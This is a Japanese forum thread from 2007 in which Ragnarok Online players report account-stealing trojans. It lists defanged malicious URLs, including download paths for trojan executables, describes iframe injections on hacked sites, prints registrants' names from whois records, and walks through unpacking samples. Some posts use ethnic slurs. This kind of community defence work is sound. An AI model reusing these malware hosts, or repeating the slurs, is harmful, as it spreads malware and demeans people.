ジャベリンと2000z盗まれたから
訴えてやるwwww

534 名前:(^ー^*)ノ〜さん :07/04/11 21:10 ID:4ild12Es0
>>529
つまり他のゲームユーザにはROやらせないってことだな
なんという根本的垢ハック対策

535 名前:(^ー^*)ノ〜さん :07/04/11 21:52 ID:NFt2ewFc0
何か勘違いしているのかもしれんが、RO以外のネトゲやMixiなんかのパスも盗まれるよ。

536 名前:(^ー^*)ノ〜さん :07/04/11 22:50 ID:VQH5VMY30
最近のタイプは、TrojだけでなくBackDoor詰め合わせも増えている。
この手の物に感染すれば、被害者が加害者の立場になる事も容易。
mixiの運営している求職サイト「Find Job!」もDDoS攻撃を受けた。当然、攻撃の踏み台に選ばれる可能性だってある。
継続的に踏み台として使われ続ければ、契約ISPから強制解約を通告されるかも知れない。
それに、ある日ドアのチャイムがなったと思ったら、黒革の手帖を提示されるかもしれないよ。

537 名前:(^ー^*)ノ〜さん :07/04/11 23:12 ID:vF8WXMEQ0
中華必死だなぁwww

そこまでしなきゃ滅びちゃうほど追い詰められてるのか?w
みんなでどんどん追い詰めていけばそのうち消えてくれるかもな

538 名前:(^ー^*)ノ〜さん :07/04/11 23:45 ID:jbWDk/2C0
Maran実装前のzhangweijp・lovetw系では
リネ・リネ2・RO・MSNメッセ(WindowsLiveメッセ)の
パス抜き4点詰め合わせが流行ったな。

aniについては欧米ではWoWのパス抜きが流行った
(と英BBCで報道されたとKasperskyのブログにあった)。
日本を含むアジアでは洋ゲーはあまり流行らんし、
世界各国で事情は意外と異なるもんだ。
たとえば南米ではネットでのクレカ番号入力が怖くてできないほど
銀行系の犯罪(フィッシング、バックドア、etc.)が多い。

539 名前:(^ー^*)ノ〜さん :07/04/12 00:21 ID:7mBNVtwN0
久しぶりにBOTNEWS見たけど、FFでの強烈な取締で
ROに大量に引っ越してきてるっぽいなぁ。
FFはパス抜きサイトが逆にユーザに書き換えられたりして
もろに人海戦術だったけど、ROはBOTもトロイもやりたい放題だしな…。

540 名前:(^ー^*)ノ〜さん :07/04/12 00:43 ID:T+LcE6iA0
>>539
垢ハックサイトを逆に乗っ取ったのか・・凄いな。

541 名前:(^ー^*)ノ〜さん :07/04/12 06:22 ID:J78f7Di+0
ROじゃもうそこまでやる熱意のある奴はいないだろうな

542 名前:(^ー^*)ノ〜さん :07/04/12 14:10 ID:PRKys3i40
もう惰性でやってる人しかいないんだからそりゃそうだ

543 名前:(^ー^*)ノ〜さん :07/04/12 14:27 ID:EPZVm8GJ0
>>517,518
転送サービス管理者に通報済みらしいけど、未だ生きてるっぽいね。
未処理なのかスルーされたのか。

544 名前:(^ー^*)ノ〜さん :07/04/12 21:40 ID:ee+hjMbl0
また自分の絵サイトに垢ハックが貼られていた。
www■gameyoou■com/cimg/index■htm

もういい加減にしてくれと…('A`)

545 名前:(^ー^*)ノ〜さん :07/04/12 22:00 ID:1GmDczAF0
垢ハックのアドを貼る作業をしている中華のほとんどはBOTだけどな
なんでも自動化されてるぜw

546 名前:(^ー^*)ノ〜さん :07/04/13 10:05 ID:3hkBHQQA0
無差別爆撃から察するに、ROなんか全然やってないひとも当たり前のように被害受けてるんだよな・・・
こりゃもう、ポリンの着ぐるみで温家宝にご注進してくるしかねえな。おまえらTV見とけよ。

547 名前:(^ー^*)ノ〜さん :07/04/13 10:46 ID:NjFPc/VjO
垢ハック食らってるMMOの運営数社集まって出るとこ出たらなんとかなりそうな気がしないでもない

548 名前:(^ー^*)ノ〜さん :07/04/13 11:56 ID:rl5cpY0w0
癌呆には100%期待できないがな。

549 名前:(^ー^*)ノ〜さん :07/04/13 12:12 ID:ok72DuZV0
ゲームってことで一般的な認識薄いけど大金動いて組織的な犯罪だしな。
他社の対応には期待したい。
言ってて情けないが。

550 名前:(^ー^*)ノ〜さん :07/04/13 12:34 ID:mSuKlgl4O
管理会社、ユーザ含めて反撃食らう可能性の低く、かつ引っ掛かってくれる人が大量にいる、いわば低能集団は絶好の狙い目

551 名前:(^ー^*)ノ〜さん :07/04/13 13:40 ID:jACKsZRt0
あっちからすれば罠踏ませといて損はないからな。
そら無差別にもなるだろう。

552 名前:(^ー^*)ノ〜さん :07/04/13 14:20 ID:4WmeC6eX0
大金って幾らくらい動いてるんだ?

553 名前:(^ー^*)ノ〜さん :07/04/13 14:38 ID:Z12wlUtv0
これを機にコンシューマに流れていく方に俺は掛けるな
MMO自体が下火になるんじゃね、法整備も遅れてるし

554 名前:(^ー^*)ノ〜さん :07/04/13 14:55 ID:k8F92G2D0
ここまで無差別に広がってるのに何も対策しない癌ワロスwwww
対策どころかアイテム課金でいかに集金するかしかやってないし

555 名前:(^ー^*)ノ〜さん :07/04/13 15:00 ID:4LK1S/gl0
誰かWEBヘルプデスクにどうなのか投稿してないのか?

556 名前:(^ー^*)ノ〜さん :07/04/13 15:20 ID:1+DsORfD0
被害あったと通報してくれれば被害があったと確認取れたら
アイテムなどはできる限り戻します。とテンプレくさいのは帰ってきた。
しかし前に来た報告だと8ヶ月かかったとか言う話もあるし、あまりにも遅いな。

このままだと今後全てのネトゲがどんな良いもの出て来ても常時垢ハックが纏わりつくな・・・
ネトゲの未来は暗い。

557 名前:(^ー^*)ノ〜さん :07/04/13 15:22 ID:4LK1S/gl0
あーすまん被害の前に
こんだけ垢ハックサイトが大量にあるのに警戒告知をださないんですか?
とかそういう文を送ってみた奴はいないのかなと
様子見て出してみるか

558 名前:(^ー^*)ノ〜さん :07/04/13 15:44 ID:1wi4W34H0
>>556
最初からハックしてもうまみのないシステムにしておけばいいんだけどな。
資産がいくらあるとかじゃなく、ゲームとしての面白さを純粋に追求すればいいと思うんだが・・・

559 名前:(^ー^*)ノ〜さん :07/04/13 19:57 ID:Z12wlUtv0
RMTにしろBOTにしろほとんど意味が無いってMMOは出てるけどな
ROはそのあたりのシステムが最悪だ、やるなって方が難しいと思う
EXP100倍、ドロップ率100倍、垢ハックされてもすぐにアイテム
保障ぐらいならなんとかなるかもな
レベルあがってすぐ飽きる?
そりゃゲームとしての楽しみがそれしかないだけであってコンテンツが貧弱なんだろう
色々追加すりゃいいのにね、こける要素満載なRO2なんてどうでもいいからさ

560 名前:(^ー^*)ノ〜さん :07/04/13 20:07 ID:UyKwP8BY0
RMTを防止するにはゲーム内経済構造から設計する必要がある
その他、ROの長大な桁数の金額を所持する事が可能な点と膨大な倉庫枠はむしろ欠陥

他のゲームを引き合いに出すのもあれだけど
対RMTを意識した経済構造を持つゲームは複数ある(チョン・シナ製ではない)

561 名前:(^ー^*)ノ〜さん :07/04/13 20:31 ID:6DAlDwm+0
http://app■cocolog-nifty■com/t/comments?__mode=red&id=12886212

知り合い周りにどかっと書き込まれてました
チェッカーかけたら
http://www■gameurdr■com/ink007996277/
に飛ばされるようですが…

アドレス見る限りコメントへのリンクに感じますし
内容次第では自然に踏んでしまう可能性も。
ココログの報告は初なのかな?

562 名前:(^ー^*)ノ〜さん :07/04/13 20:46 ID:zvfaNwqP0
>>559
エミュかよ

てかエミュでも垢ハックの事件は起きてるぜ
中華はRMTによる金儲けのための本鯖でしか垢ハックしないだろうけどな。

563 名前:(^ー^*)ノ〜さん :07/04/13 21:11 ID:OZYUw72U0
>>552
何年か前の数字だけど、RMT市場はアメリカと韓国が1000億円、
日本が100億円だった(MSN配下になる前の毎日新聞の記事)。
この2000億円以上の仮想通貨(ゼニーとかアデナとかギルとか)の多くが中国産。
BOTや肉入りのゴールドファーマーがほとんどだと思うので、
ハッキングによるものは1割あるかないかじゃないかな。
ちなみに2000億円という数字は世界のゲームソフト市場の1割に匹敵する
(2兆円市場。オンライン・オフライン、PC・携帯電話・コンシューマを問わない)。

564 名前:(^ー^*)ノ〜さん :07/04/13 21:13 ID:x/SWAz6+0
カスペルスキーの体験版を導入したところ、
Exploit.HTML.Mht(動作分類 ハックツール(Exploit)というのが大量に出てきました
駆除ができませんでしたと出てしまうのですが、
これはすでに垢ハックされてしまっている可能性があるのでしょうか?

565 名前:(^ー^*)ノ〜さん :07/04/13 21:48 ID:k8F92G2D0
駆除したければ製品版買えやって事だろ

566 名前:(^ー^*)ノ〜さん :07/04/13 22:16 ID:ok72DuZV0
>>557
先月送った。癌社員の不正の上にでも注意書き載せろつって。
今のところ音沙汰なし。

567 名前:(^ー^*)ノ〜さん :07/04/13 22:16 ID:zvfaNwqP0
カスペルスキー様がばら撒いたウィルスだしなwww

568 名前:(^ー^*)ノ〜さん :07/04/13 22:18 ID:ok72DuZV0
でもこういうのは数勝負なとこもあるから、投稿増えればなんとか動いてくれんかなー。
もしくはこういうのってセキュリティ系のなんかそういう組織とかがケツ叩いたりはしてくれんのだろうか。

569 名前:(^ー^*)ノ〜さん :07/04/13 22:36 ID:1ZUVdZC30
「BOT対策頑張ってます」(キリッ)
で終わりだろ

570 名前:(^ー^*)ノ〜さん :07/04/14 01:13 ID:S9lS6rXX0
>>561
報告お疲れ

とりあえずniftyに報告汁
ここでいうよりniftyに言うほうがずっと早い

571 名前:(^ー^*)ノ〜さん :07/04/14 03:30 ID:UxEWV1ko0
【  アドレス   】 http://tiamet■sakura.ne■jp/south/futab■.htm
           もしくはhttp://tiamet■sakura.ne■jp/lovelovelemon/futaba■htm
【気付いた日時】 4/14 02時半ごろ
【     OS    】 Windows XP media Center Edition
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 4/12の自動更新だったと思います
【 アンチウイルスソフト 】フレッツ光を導入したときについてきたセキュリティ対策ツール
                というもの
【その他のSecurty対策 】
【 ウイルススキャン結果】 カスペルスキーのオンラインスキャン
                
【スレログやテンプレを読んだか】 Yes/
【説明】Tiaの某南となかよし板のどちらかなんですが、どちらか忘れてしまいました。
    某スレのアレのリンク部分からとんだとき、画面が真っ白になり、
    驚いてURLを削ったら、ページは確かにTiaの某スレのアレだったようで、
    もう一度同じアドレスを踏みなおしてみたらちゃんと通常のBBS画面が出てきました。
    ただの何かのエラーで空白ページになっちゃったんだろう、と思いましたが
    一応カスペでスキャンしてみたら Exploit.HTML.Mht というのに感染していたようです。
    これがアカハックのウィルスと関係があるのか、ハズカシながらよく分かりません。
    
スレ内を検索してみたら、564の方と同じのようですね。
その後のレスを見る限り、これは関係ない…という判断でいいのでしょうか。

572 名前:571 :07/04/14 03:39 ID:UxEWV1ko0
んー、今再度1を読み返したら

重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

とありますね…。
質問にしてしまったのはここではマズかったでしょうか。
ご指摘あれば雑談スレ?のほうへ行きますが…。

573 名前:(^ー^*)ノ〜さん :07/04/14 03:42 ID:8F4NwBae0
Exploit.HTML.Mht

警告レベル: 緑(低)
別名
Exploit.HTML.Mht (Kaspersky Lab) は以下の名称でも知られています:
Exploit-MhtRedir.gen (McAfee), Exploit:HTML/MhtRedir.gen* (RAV), HTML/Exploit.Mhtml (H+BEDV), Exploit.HTML.MHTRedir.1n (ClamAV), Exploit/Mhtredir.gen (Panda)
登録日 2004年7月6日
動作分類 ハックツール(Exploit)
技術情報

このファィルは、Internet Explorer のセキュリティの脆弱性を使って、悪意があるプログラムをPCにダウンロードしてインストールするように試みるインストラクションを含んでいます。


古いものだしちゃんとWinupdateしてれば脆弱性は塞がれてると思うけどどうなんだろうね

574 名前:(^ー^*)ノ〜さん :07/04/14 04:10 ID:V0/GMzoO0
前のAssassinTemplateのトップに張ってある
http://wi■i.deny■jp/assas■in/
これはどうなんでしょうね
今のアサテンプレとURLが違うようなので怖かったんですが・・・

575 名前:(^ー^*)ノ〜さん :07/04/14 04:13 ID:8F4NwBae0
ここはURL鑑定スレじゃないとあれほど…
あと伏せるなら「.」を変えてくれないとわかりにくい

576 名前:(^ー^*)ノ〜さん :07/04/14 04:26 ID:V0/GMzoO0
すいませんorz
http://wiki■deny■jp/assassin/
何分あまりこういうこと詳しくないもので・・・
言い訳ですね、ゴメンナサイ・・・

577 名前:(^ー^*)ノ〜さん :07/04/14 04:58 ID:ZbiblCU00
サーバが見つからないと出るな。
すでに消された、ハックサイトかもしれん。

578 名前:(^ー^*)ノ〜さん :07/04/14 06:11 ID:wEmOrqJR0
>>577
お〜い、非道いってそれは。
それは前管理人時代のアサシン・モンクWikiのURLだ。
但し、whoisの情報を見る限りでは、管理者の引き継ぎが行われて以降、該当ドメインは失効し、新たに誰かが取得している。
現在のドメインオーナーについては、whoisの情報以上の詳細については完全に不明。

579 名前:にゅぼーん :にゅぼーん
にゅぼーん

580 名前:(^ー^*)ノ〜さん :07/04/14 12:53 ID:pOJsF7qH0
アカハクドメインをぐぐっていると次のものを発見した。
www■gomeodc■com/mmkk■com

14日当初、ClamWinで検知
mmkk■com: Trojan.Spy-2868 FOUND

その後のVIRUSTOTAL結果、これはひどい。
この時点でClamが検知しなくなったので入れ替えられたかもしれない。
キングに検体発射済み、と言うか簡単に送れる送付先そこしか知らん。
www.virustotal.com/vt/en/resultadof?39e8bf1282ed8cce69828d9bac207c56

www■gomeodc■com からは以下がIFRAMEで呼び出される。
www■vviccd520■com/img/mm■htm スクリプト
www■vviccd520■com/img/mm■jpg サイズ0で呼び出される単なる画像?

登録情報、福建人どものようですね。
Domain Name.......... gomeodc■com
Creation Date........ 2007-03-25 14:15:19
Registration Date.... 2007-03-25 14:15:19
Expiry Date.......... 2008-03-25 14:15:19
Organisation Name.... longdahaomengong shi
Organisation Address. longyanshizhongshanglu 33hao
Organisation Address.
Organisation Address. longyan
Organisation Address. 364000
Organisation Address. FJ
Organisation Address. CN

Domain Name ..................... vviccd520■com
Registrant Name ................. kuang zhang
Registrant Organization ......... lingfeng gongsi
Registrant Address .............. longyan lingfenggongsi
Registrant City ................. long yan
Registrant Province/State ....... FJ
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN

581 名前:(^ー^*)ノ〜さん :07/04/14 14:32 ID:YQqOZHyk0
http://shidan■blog8■fc2■com/
ここを見たらすごく重くて、表示も変だったのですが大丈夫でしょうか・・Orz

582 名前:(^ー^*)ノ〜さん :07/04/14 14:43 ID:S9lS6rXX0
>>579は削除依頼出してきた。
という事で書き直し。

日時 :2007-04-14 10:53:26
記事タイトル :省略
▼記事を見る▼
http://ameblo■jp/*****/


URL:http://www■geocitylinks■com/games/
IP :210.16.231.9

----ここまでが書かれた記事など(編集あり)

仕組み
すぐ http://www■fanavier■net/games/server■exe に飛ぶように仕掛けてる
ソースチェッカーで確認すると危険アドレスとは出るがウイルスとは認識してないから亜種と思われる


ちなみに今現在ソースチェックすると中文の404ページに飛ぶ

コメントはギルド紹介をそのまんまぱくったもの。

そういやラブログだっけ?それで作ったアメブロをそのまま使ってるんだけど、こういうの俺だけかな?
コメント承認以外防ぎようがない…('A`)


>>581
そんなあなたに

つ[ソースチェッカー]

人柱になってきたがチェッカーでも普通に見ても異常なし

583 名前:(^ー^*)ノ〜さん :07/04/14 15:37 ID:YQqOZHyk0
>>582
ありがとうございます。
どうしてかわかりませんが、そのサイトを見ようとするとPCがフリーズしそうなくらい重くなって表示もめちゃくちゃになるんです。
IEがおかしいのかな・・。何もなくて安心しました。

584 名前:(^ー^*)ノ〜さん :07/04/14 17:18 ID:Gcoysc9b0
>>エルク (07/04/14(Sat) 15:32) [ID:f9BkQo8z] #46754 [210.197.151.127]
>>127.151.197.210.in-addr.arpa name = OFSfb-21p4-127.ppp11.odn.ad.jp.
>>どうやら、ROはまだまだ続くようで。
>>もう新規アップデートはないようなこと
>>言ってなかったっけ?
>>気のせいか。
>>とりあえず、新曲が出ているようで。
>>こちらで聴けます。
>>94.mp3〜97.mp3
>>http://***.soultaker***.***/******/(一部伏字処理)

776に貼ってあったらしいです。
詳細不明。
丁度韓国のEP12.1内容に関して少し情報が出たタイミングなのでこんな書き込みに注意。

585 名前:(^ー^*)ノ〜さん :07/04/14 20:59 ID:6MjjVsoi0
>>580
mm.jpg、500x375のエロ画像だった
(あっちの環境がクソなのでたまたま読み込めなかったものと思われ)。
他は今からいじってみますわ。
誰でも送れる検体送付先をある程度知ってるけど需要ある?

586 名前:(^ー^*)ノ〜さん :07/04/14 21:06 ID:6MjjVsoi0
続き。mm.htmは200kBほど(でかっ)のmmdd.exeを落とす…んだけど重い。
こいつが本体と思われ。ブラウザではたぶん無理、ダウンローダ推奨。

587 名前:(^ー^*)ノ〜さん :07/04/14 21:44 ID:6MjjVsoi0
>>582
現時点でそのserver.exeが存在しない(404)。

>>581
>>1 を読んで移動せよ。

588 名前:(^ー^*)ノ〜さん :07/04/14 22:24 ID:4BEoDD4m0
不安なので投稿させてくださいorz

【  アドレス   】 http://bqdr■blog98■fc2■com
【気付いた日時】 4/14 16時頃
【     OS    】 Windous XP Home Edition
【使用ブラウザ 】 IE
【WindowsUpdateの有無】 4/13
【 アンチウイルスソフト 】 なし。
【その他のSecurty対策 】 なし。
【 ウイルススキャン結果】 リアルタイムでやってます。
【スレログやテンプレを読んだか】 今から読みます。
【説明】
実は垢ハックされてないのですが、ついさっきRO blogさんにあった警告を見て,
ヤバイと思って履歴を見たら普通に残ってましたorz
踏んだのは今週の月曜日なのですが,何もされていません。
毎日ログインしてましたが特に変わったことはありませんでした。
とりあえず、不安なのでパスワードだけ変更しておきました。
オンラインウィルス検索してみても何も出ませんでしたが,一応OS再インストールするべきでしょうか。。。

589 名前:(^ー^*)ノ〜さん :07/04/14 22:25 ID:Ls2oFjba0
>>585
>誰でも送れる検体送付先をある程度知ってるけど需要ある?
F-Secua、キングソフト、NOD32辺りは知ってるが。取り敢えず、LiveROの方に書いとくといいかと。
こっちではまとめの人の検索性が悪くなるので移動した方がいいんでないかな。

590 名前:(^ー^*)ノ〜さん :07/04/14 22:28 ID:Ls2oFjba0
>>588
hosts書き換えとかはやってあるのかな?

まずは検査、踏んでも回避できる策を講じてないのに、引っ掛からなければ、別のソフトで再度スキャン。
複数の検査でも、出てこないなら、すり抜けする新規の代物か確認してもらうため、LiveROのスレで相談。

「心配ならOS入れなおせ」というのがこのスレでの結論。

591 名前:(^ー^*)ノ〜さん :07/04/14 22:32 ID:6MjjVsoi0
mmdd.exeやっと落とせた。これ手間かかってんなー。
UPXで固めてあるので解凍。このexeはWinRAR自己解凍書庫なのでさらに解凍。
1.jpgと22.exeが出現。1.jpgは笑えるアニメgifで、22.exeがトロイ本体。
22.exeはUPXで固めてさらにいじってあるのでここで断念。提出予定。

592 名前:(^ー^*)ノ〜さん :07/04/14 22:32 ID:l3LAkSbJ0
>>588
不安なようならOS再インストールして
これを期にIE→FireFoxとかセキュリティソフト入れるなりした方がいいんじゃないか。

593 名前:(^ー^*)ノ〜さん :07/04/14 23:40 ID:1h7no7II0
>>589
キングソフトは未だにすげー抵抗がある・・・

594 名前:(^ー^*)ノ〜さん :07/04/15 00:20 ID:Ny5SGlh30
コピった開発環境で金儲けしようとしてる様に見える。

595 名前:(^ー^*)ノ〜さん :07/04/15 00:32 ID:6heUjr1B0
レスありがとうございます。
とりあえず凄い不安で不安でしょうがないのでOSを入れなおそうと思います。
が、実はOS入れなおすの初めてでして,この場合,Cドライブだけでなく全部やりなおしたほうがいいのでしょうか・・・

ちなみにhostsの書き換えはやっていませんでした(´・ω・`)

596 名前:588 :07/04/15 00:34 ID:6heUjr1B0
>>595
は、私ですorz

597 名前:(^ー^*)ノ〜さん :07/04/15 00:50 ID:AUjxxU8o0
>>595
踏んだ後に、ログイン・パスワード変更などを一切行なっていないなら、そのまま再インストール。

踏んだ後に、ログイン等を行なっていたら、急いで1CDLinux等を作成し、安全な環境からパスワード変更。
(↑これだけは至急で) その後に、OS入れなおし。

普通の使い方であれば、起動ドライブのみ入れなおしでOK。ブラウザのキャッシュ等を別ドライブに置いてるとか
ROがそっちのドライブに入っているとか、変わったことをやっていれば、そちらに残骸が残る可能性はあるので
OSだけ入れなおせばいいと保証することはできない。

598 名前:(^ー^*)ノ〜さん :07/04/15 03:17 ID:/9/GYwS60
>>580 のmmkk.com(中身exe)も落とせた。
500kB以上とサイズが全然違うけど、固め方は >>591 と同じ。
んで22.exeが微妙に違う。ドメインもIPも違うけど同じ犯人。
ちなみにKasperskyがmmddもmmkkも検知。
mmddを送ってからmmkkをダウンロードしている間に対応された…。
>>582 のserver.exeがアップされた模様。

599 名前:(^ー^*)ノ〜さん :07/04/15 03:34 ID:/9/GYwS60
>>582 PESpin(ポーランド製?)ってので固めてあった。
初めて聞いたよ…。物としては普通の(?)Maran。

600 名前:(^ー^*)ノ〜さん :07/04/15 09:44 ID:BXnkQovi0
不安なので投稿させてください。

【  アドレス   】 ttp://www■hosetaibei■com/bbs/ 
【気付いた日時】 4/15 9時頃
【     OS    】 Windous XP Home Edition sp2
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 4/12前後の更新です
【 アンチウイルスソフト 】 avast
【その他のSecurty対策 】 ZONEALARM
【 ウイルススキャン結果】 現在進行形でやってます。
【スレログやテンプレを読んだか】 以前から拝見しています。
【説明】
ブログのコメント欄に記載されていたため、削除、拒否設定しようとしたら
間違えて踏んでしまいました。
飛んだ先の画面は青い背景のものです。
ソースチェッカーで確認したところフレームタグが2つ見つかり、
どちらとも危険なURLのひとつです、と表示されました。
アカハックされているかはログインしていないので分かりません。

601 名前:(^ー^*)ノ〜さん :07/04/15 10:02 ID:AUjxxU8o0
>>600
>アカハックされているかはログインしていないので分かりません。
パスワードの送信をしない限りは検知読み出されない。ログインしてないなら一切しないこと。

一度もログイン。パス変更などしていないなら、検索して除去、もしくは、OS再インストール

ログインやパス変更をしてしまっていたら、それが読まれている可能性があるので
1CDlinuxなどの安全な環境で起動してパス変更。その後、除去もしくはOS再インストール。

>不安なので投稿させてください。
不安なので〜というのは、こっちのスレじゃなく、LiveROの担当。
でも、踏んでしまった場合の対処方法はこっちのスレ。

602 名前:(^ー^*)ノ〜さん :07/04/15 11:05 ID:/9/GYwS60
firfir1■blog90■fc2■com
いつものiframe呼び出し(lovetw)。

ブログとしての自由度が減るからタグの制限は難しいかもしれないけど
せめてアカウント取得に何らかの制限を付けられないもんかねぇ…。

603 名前:(^ー^*)ノ〜さん :07/04/15 19:15 ID:6heUjr1B0
>>597
ありがとうございます。
ですが、1CDLinuxが上手く作れず上手く機動してくれません。
この際、きっぱり諦めてOS入れなおしたほうがいいでしょうか・・・

604 名前:(^ー^*)ノ〜さん :07/04/15 20:01 ID:AUjxxU8o0
>>603
緊急性は、パスワードを読み取られる可能性のある行為をしたのかどうかによる。自己責任でどうぞ。

605 名前:(^ー^*)ノ〜さん :07/04/15 21:57 ID:iPn4BNYK0
毎度おなじみの福建人の新ドメイン

blog-ekndesign■com

Domain Name ..................... blog-ekndesign■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN

606 名前:(^ー^*)ノ〜さん :07/04/15 22:06 ID:iPn4BNYK0
どうも605のはまたも錯誤狙いのようだ。

ハイフンをドットに変えるとドットブログと言う国内のサービスページが存在する。
ttp://blog.ekndesign.com/

607 名前:(^ー^*)ノ〜さん :07/04/15 22:23 ID:iPn4BNYK0
と思ったら13日は福建人のアカハクドメイン入れ食い状態。
16、7分の間に6つもドメインを取っている。
なんちゃってニフティ復活。
多いので分割するわ。

Domain Name ..................... gamesmusic-realcgi■net
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:55:53


Domain Name ..................... homepage-nifty■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:49:02


Domain Name ..................... jpxpie6-7net■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:52:58

608 名前:(^ー^*)ノ〜さん :07/04/15 22:24 ID:iPn4BNYK0
後編
Domain Name ..................... irisdti-jp■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:42:51


Domain Name ..................... plusd-itmedia■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:41:21


Domain Name ..................... runbal-fc2web■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:57:06

609 名前:にゅぼーん :にゅぼーん
にゅぼーん

610 名前:(^ー^*)ノ〜さん :07/04/15 23:35 ID:XUJ0uFLQ0
乙。いまさらなie6xpに泣いた。ie7vistaとかで取れよ…。

611 名前:(^ー^*)ノ〜さん :07/04/15 23:38 ID:P6EKnolt0
>>610
それは既にある

612 名前:(^ー^*)ノ〜さん :07/04/15 23:39 ID:P6EKnolt0
追記

もちろん中華なので試さないように

613 名前:(^ー^*)ノ〜さん :07/04/15 23:54 ID:XUJ0uFLQ0
あーあるね。でもこれカナダのドメイン業者じゃね?

614 名前: ◆sp4Sh9QXGI :07/04/16 00:27 ID:HVBNsJ4v0
deco030-cscblog■comのみ222.77.185.84、
残りは222.77.185.110でした。
必死です。

615 名前:(^ー^*)ノ〜さん :07/04/16 00:43 ID:BaSWdwq50
しかしすごい量だな…。

616 名前:(^ー^*)ノ〜さん :07/04/16 01:37 ID:BaSWdwq50
PC用冷却パーツで有名なZalmanのサイトが改竄された模様。
www■zalman■co■kr
先頭に以下のiframeが仕込まれている(台湾の短期大学)。
www■yuhing■edu■tw/board/where/where.htm
中身はjpgに偽装したaniカーソルのスクリプト。
aniは以下の2匹だけど現在は消えている。
www■yuhing■edu■tw/board/where/z1.jpg
www■yuhing■edu■tw/board/where/z2.jpg
スクリプトはそのまま残っているので、
短大のサーバのウイルス対策ソフトにaniだけ消されたものと思われ。

617 名前:(^ー^*)ノ〜さん :07/04/16 01:40 ID:qbjWBBUv0
おいおい・・・そろそろ限度ってモンを越えてないか?

618 名前:(^ー^*)ノ〜さん :07/04/16 02:12 ID:BaSWdwq50
なに、とっくに超越している。
価格comにリネージュトロイが仕込まれたこともある。
0-dayならともかく簡単に食われるようなサーバも悪い。

619 名前:(^ー^*)ノ〜さん :07/04/16 04:42 ID:08W2INan0
一応報告
>>506にも載っていますが書き込まれた場所が違うので。
某ME系サイトに投稿されていた垢ハック書き込み。
以前投稿された書き込みをそのままコピーし、Homeの部分だけアカハクアドレスに
すり替えてるというもの。

【アドレス】ttp://asdsdgh-jp■com/onlien

まとめサイトから行けるソースチェッカーで調べてみた所、危険アドレスとして
警告は出ないもののソースを見ると・・・
【注】ttp://www■conecojp■net/online/jpt1■exe
↑を実行するように・・・。(このアドレスは危険アドレスとして警告でます)
まとめサイトの危険サイト&ドメインリストに載っているものの一つですね。
やっぱりソースチェッカーだけでは不十分なんだな〜っとつくづく感じた。

620 名前:(^ー^*)ノ〜さん :07/04/16 09:41 ID:b3AMl+zg0
こんなドメインも登録された、なんちゃってガマニア。
ソース冒頭のスクリプトで罠置き場を呼び出す。

www■gamanian688■com
ws91■com/2■js (難読化スクリプト 1-3まである)

登録情報、上のは福建。
下のは罠以外のページを確認出来ないので仲間と思われる。

Domain name: gamanian688■com
Registrant Contact:
linxiaoyun
xiaoyun lin
- fax: -
-
- Fujian -
cn
Created: 2007-04-13


Domain Name:ws91■com
Registrant:
ying hu
xiangtan hunan china
201176

Administrative Contact:
ying
ying hu
xiangtan hunan china
xiangtan Beijing 201176
CN
Expiration Date: 2007-12-04

621 名前:(^ー^*)ノ〜さん :07/04/16 10:10 ID:b3AMl+zg0
www■gamanian688■com の罠スクリプト部分がもう外されている。
コール先のws91をhostsで対処後、OPERAで飛び込んだ直後に消したんで、
罠ドメインであることの発覚を恐れ慌てて消したと思う。
この間数分の出来事だったからね。

また違う罠を仕込もうとするかもしれないので要警戒。
下のws91は罠バリバリで置かれてる。

622 名前:(^ー^*)ノ〜さん :07/04/16 10:16 ID:dPJsVngY0
無関係サイト改竄とか完全にRoをハック狙い撃ちされてるのに
こんな状態でも何の警告も対策も出せない癌/(^o^)\
これは本当に末期かも知れんね
Roがなくなれば無関係サイトへの被害がなくなると考える常識人が出てもおかしくない

623 名前:(^ー^*)ノ〜さん :07/04/16 12:13 ID:eVLj2nEI0
【  アドレス   】 ttp://www■game-mmobbs■com/bbs/

散々既出のURLだけど、自分のwikiサイトが改変されてたのに気付いて編集した直後に、またやられた。
被害内容は、既存で貼られた個人リンクのURLだけを、これらハックURLに変更された。

偶然だと思うが、改変先を監視してるとかないよね。

少し遡ると、こういうURLもあった…どうも変更先の目標にもなってる気がするんだよね・・・。
【  アドレス   】 ttp://■www■maplestorfy■com

624 名前:(^ー^*)ノ〜さん :07/04/16 12:35 ID:VT4wvVpLO
ミクシーのHPそのものに罠を仕掛けるのは可能?
どうみても怪しい所が存在してるんだけど。
「ラグナロク」にヒットするレビュー物全てにコピペされたアドが貼りまくりだもんで。

625 名前:(^ー^*)ノ〜さん :07/04/16 13:20 ID:eVLj2nEI0
